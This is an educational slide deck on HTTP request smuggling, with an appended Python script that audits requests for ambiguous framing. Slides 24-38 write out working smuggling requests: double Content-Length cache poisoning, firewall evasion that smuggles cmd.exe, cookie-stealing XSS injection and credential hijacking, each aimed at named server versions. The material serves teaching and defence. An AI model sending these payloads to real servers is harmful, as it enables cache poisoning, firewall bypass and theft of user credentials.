
HTTP Request Smuggling



  2. Overview of HTTP Request Smuggling
     • The result of a device failing to properly handle malformed inbound HTTP requests.
     • The attacker sends multiple specially crafted HTTP requests that cause the two attacked entities to see two different sets of requests.
     • This allows the attacker to smuggle a request to one device without the other device being aware of it.
     • HRS does not require the existence of an application vulnerability.
  3. Threats
     • Financial loss as a result of web site defacement.
     • Theft of user credentials using cross-site scripting.
     • Worm attacks like Nimda, by attacking web-filtering firewalls.
  4. Basic Concept
  5. Terminology
     • HTTP header
     • Web proxy (e.g. Squid, ISA Server 2000)
     • Web server (e.g. Tomcat, IIS, Apache, WebLogic)
  6. HTTP header
  7. Web proxy
     • Examples: Squid, ISA Server 2000
     • Acts as an intermediary for requests from clients seeking resources or services from other servers
     • Resources such as files, connections, web pages
     • Services such as requests to a web server; done to simplify and control complexity
  8. Web server
     • An HTTP server or application server
     • A program that serves content using the HTTP protocol
     • Examples: Tomcat, IIS, Apache, WebLogic
  9. History of HTTP Smuggling
     • Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and 7.0 had an input validation error.
     • Sun Java proxy 3.x, 4.x and Sun ONE application server 7.x, 8.x easily led to web cache poisoning because of non-standard HTTP behaviour.
     • Oracle's corrupt cache server led to the firewall being unable to detect malicious requests.
  10. Basic concept
  11. Scenario 1
      • An attacker can launch a smuggling attack in order to poison the cache server.
      • The attacker can change the entries in the cache, so that an existing page A is cached under URL B.
      • This type of attack targets the cache server.
  12. Scenario 2
      • Smuggling bypasses the firewall installed in front of the web server.
      • Directly compromises web security.
      • This attack targets the web server itself.
  13. Scenario 3
      • Use of a proxy server that shares a TCP connection with the web server.
      • The attacker steals client credentials without contacting the client.
      • Potentially a strong attack.
  14. Scenario 3 continued…
  15. Types of Attacks
      • Cross-Site Scripting (XSS)
      • Web Cache Poisoning (defacement)
      • Cross-user attacks
      • Hijacking pages with user-specific information
      • Browser cache poisoning
  16. Cross-site Scripting
      • Injects client-side malicious code
      • Folds malicious content into content delivered from a compromised site
      • A special case of code injection
      • Examples
  17. Cross-site Scripting
  18. Cache Poisoning
      • Find vulnerable code
      • Flush the cache server's actual content
      • Send a special request that gets stored
      • The response to any client request will be the infected content
  19. Cache Poisoning
  20. Cross-User Attacks
      • A single request creates 2 responses
      • The second response is mis-interpreted as the response to a different query
      • That may be another user sharing the same TCP connection
      • Mimic behaviour and obtain private info
  21. Cross-User Attacks
  22. Hijacking pages with user-specific information
  23. Example with code
  24. Web Cache Poisoning (header)
      1  POST http://SITE/foobar.html HTTP/1.1
      2  Host: SITE
      3  Connection: Keep-Alive
      4  Content-Type: application/x-www-form-urlencoded
      5  Content-Length: 0
      6  Content-Length: 44
      7  [CRLF]
      8  GET /poison.html HTTP/1.1
      9  Host: SITE
      10 Bla: [space after the "Bla:", but no CRLF]
      11 GET http://SITE/page_to_poison.html HTTP/1.1
      12 Host: SITE
      13 Connection: Keep-Alive
      14 [CRLF]
  25. Web Cache Poisoning (Cache Server)
      • The cache server reads the LAST Content-Length header
      • The web server reads the FIRST Content-Length header
  26. Firewall/IPS/IDS Evasion
      1  POST /page.asp HTTP/1.1
      2  Host: chaim
      3  Connection: Keep-Alive
      4  Content-Length: 49223
      5  [CRLF]
      6  zzz...zzz ["z" x 49152]
      7  POST /page.asp HTTP/1.0
      8  Connection: Keep-Alive
      9  Content-Length: 30
      10 [CRLF]
      11 POST /page.asp HTTP/1.0
      12 Bla: [space after the "Bla:", but no CRLF]
      13 POST /page.asp?cmd.exe HTTP/1.0
      14 Connection: Keep-Alive
      15 [CRLF]
  27. Firewall Parsing
      • The firewall reads the first request as having a body of 49,223 bytes: line 6 (49,152 copies of "z") plus lines 7-10 (highlighted in salmon on the slide, 71 bytes in total), since 49,152 + 71 = 49,223.
      • It then continues parsing the second request at line 11 and treats line 13 to the end as part of the Bla header.
  28. Overall Result
      • CMD.EXE gets smuggled past the firewall
      • The same mechanism as the popular Nimda and Code Red attacks
  29. Request Hijacking
      1  POST /some_script.jsp HTTP/1.0
      2  Connection: Keep-Alive
      3  Content-Type: application/x-www-form-urlencoded
      4  Content-Length: 9
      5  Content-Length: 204
      6
      7  this=thatPOST /vuln_page.jsp HTTP/1.0
      8  Content-Type: application/x-www-form-urlencoded
      9  Content-Length: 95
      10
      11 param1=value1&data=<script>alert("stealing%20your%20data:"%2bdocument.cookie)</script>&foobar=
  30. ISA Server 2000 (cache server) / Tomcat Parsing
      • Microsoft ISA/2000 proxy server sees this as a single POST request.
      • Tomcat interprets it as one complete HTTP POST (lines 1-7, including "this=that" on line 7),
      • plus one incomplete POST request (lines 7-11) whose declared body length is 95 bytes but with only 94 bytes provided; this incomplete request is queued.
      • The first (complete) request gets a response, which ISA sends to the attacker.
  31. The Attacker's Request
      • When ISA now receives a request from a client (e.g. a GET request), that request is forwarded to Tomcat.
      • Queued request:
        POST /vuln_page.jsp HTTP/1.0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 95
      • The first byte of the client's request is glued on as the missing 95th body byte:
        param1=value1&data=<script>alert("stealing%20your%20data:"%2bdocument.cookie)</script>&foobar=G
      • Notice that the client will receive an HTML page with malicious JavaScript code in it:
        <script>alert("stealing your data:"+document.cookie)</script>
  32. Request Credential Hijacking (through a proxy server)
      The attack is as follows:
      1. POST /some_script.jsp HTTP/1.0
      2. Connection: Keep-Alive
      3. Content-Type: application/x-www-form-urlencoded
      4. Content-Length: 9
      5. Content-Length: 142
      6. this=thatGET /some_page.jsp?param1=value1&param2=value2 HTTP/1.0
      7. Content-Type: application/x-www-form-urlencoded
      8. Content-Length: 0
      9. Foobar:
  33. Request Credential Hijacking (through a proxy server)
      When the client sends a request, such as:
      1. GET /mypage.jsp HTTP/1.0
      2. Cookie: my_id=1234567
      3. Authorization: Basic ugwerwguwygruwy
      Tomcat will glue this onto the queued incomplete request, and together it will have:
      1. GET /some_page.jsp?param1=value1&param2=value2 HTTP/1.0
      2. Content-Type: application/x-www-form-urlencoded
      3. Content-Length: 0
      4. Foobar: GET /mypage.jsp HTTP/1.0
      5. Cookie: my_id=1234567
      6. Authorization: Basic ugwerwguwygruwy
  34. HRS Techniques
  35. Double Content-Length header
      • The cache server uses the last Content-Length header, while the web server uses the first Content-Length header (examples #1 and #4).
      • The following cache servers were observed to use the last Content-Length header: Microsoft ISA/2000; Sun Microsystems SunONE 3.6 SP4
      • The following web servers were observed to use the first Content-Length header: Jakarta Tomcat 5.0.19 (Coyote/1.1); Tomcat 4.1.24 (Coyote/1.0); Sun Microsystems SunONE web server 6.1 SP1
  36. GET Request with Content-Length (backward smuggling)
      • The web servers that display this behaviour are: Microsoft IIS/6.0; Jakarta Tomcat 5.0.19 (Coyote/1.1); Tomcat 4.1.24 (Coyote/1.0); Sun Microsystems SunONE web server 6.1 SP1
      • Sample attack:
        1 GET http://SITE/static_foobar.html HTTP/1.1
        2 Connection: Keep-Alive
        3 Host: SITE
        4 Content-Type: application/x-www-form-urlencoded
        5 Content-Length: 40
        6
        7 GET http://SITE/page_to_poison.html HTTP/1.1
        8 Foo: GET /poison.html HTTP/1.0
        9
  37. CRLF SP CRLF trick
      • Entities that treat CRLF SP CRLF as a continuation of the previous header: Checkpoint FW-1 kernel R55W beta; Squid (under some conditions); Tomcat 4.1.24 (Coyote/1.0); Sun Microsystems SunONE web server 6.1 SP1
      • Web servers that treat CRLF SP CRLF as an end-of-headers mark: Microsoft IIS/5.0
      • Sample attack:
        1 POST /dynamic_foobar.asp HTTP/1.0
        2 Connection: Keep-Alive
        3 Content-Type: application/x-www-form-urlencoded
        4 [SP]
        5 GET /malicious_url HTTP/1.0
        6
  38. CRLF SP CRLF trick
      Parsing of the sample attack above:
      1. FW-1 will send lines 1-6 to the web server (IIS/5.0) as one request
      2. IIS/5.0 will interpret this input as two requests
  39. Prevention
      • Install a web application firewall that protects against HRS attacks.
      • Terminate the client session after each request.
      • Make all pages non-cacheable.
      • Deploy a web server that follows a strict HTTP parsing procedure.
      • Allow only SSL communication from client to server.
      • Turn off TCP connection sharing on the intermediate devices.
  40. Conclusion
      • Commonly ignored because of its complexity.
      • Difficult to detect in logs.
      • Poisons proxy caches, pilfers credentials and leverages XSS without involving the client.
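The three techniques on slides 24-25, 35, 36 and 37-38 all come down to a request head whose framing two devices can read differently, which is something a strict ingress parser can refuse before forwarding. The audit below is an added example, not code from the original slides: parse_head, declared_body_length and audit_request are names chosen here, and the sample heads are constructed to mirror the slides' payloads.

```python
# Constructed sample request heads (added here, not from the original slides);
# each mirrors one of the HRS techniques the slides describe.
SAMPLES = {
    "double_cl": b"POST /foobar.html HTTP/1.1\r\nHost: SITE\r\n"
                 b"Content-Length: 0\r\nContent-Length: 44\r\n\r\n",
    "get_with_body": b"GET /static_foobar.html HTTP/1.1\r\nHost: SITE\r\n"
                     b"Content-Length: 40\r\n\r\n",
    "crlf_sp_crlf": b"POST /dynamic_foobar.asp HTTP/1.0\r\nConnection: Keep-Alive\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n \r\n",
    "clean": b"GET /index.html HTTP/1.1\r\nHost: SITE\r\n\r\n",
}

def parse_head(raw: bytes):
    """Return (method, [(name, value)], findings) for one request head.
    Headers are split on CRLF only; a line starting with SP/HTAB is the
    obs-fold case (FW-1/Tomcat treat 'CRLF SP CRLF' as a continuation,
    IIS/5.0 as end of headers), so it is reported rather than joined."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = [l for l in head.split(b"\r\n") if l]
    method = lines[0].split(b" ", 1)[0].upper()
    headers, findings = [], []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):
            findings.append("CRLF SP CRLF / obs-fold line: ambiguous end of headers")
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("non-header line inside header block: %r" % line)
            continue
        headers.append((name.strip().lower(), value.strip()))
    return method, headers, findings

def declared_body_length(headers, policy):
    """Body length a device would frame with: policy 'first' (Tomcat, SunONE
    web server) or 'last' (ISA/2000, SunONE proxy) Content-Length header."""
    values = [int(v) for n, v in headers if n == b"content-length"]
    if not values:
        return 0
    return values[0] if policy == "first" else values[-1]

def audit_request(raw: bytes):
    """List every HRS framing ambiguity in one request head (empty = clean)."""
    method, headers, findings = parse_head(raw)
    cls = [v.decode() for n, v in headers if n == b"content-length"]
    if len(cls) > 1:
        findings.append("multiple Content-Length headers: first=%s last=%s" % (cls[0], cls[-1]))
    if cls and method in (b"GET", b"HEAD"):
        findings.append("Content-Length on %s request (backward smuggling)" % method.decode())
    return findings
```

Running audit_request over each entry of SAMPLES shows the double-Content-Length head framed as 0 bytes under the "first" policy and 44 under "last", which is exactly the disagreement slide 25 relies on.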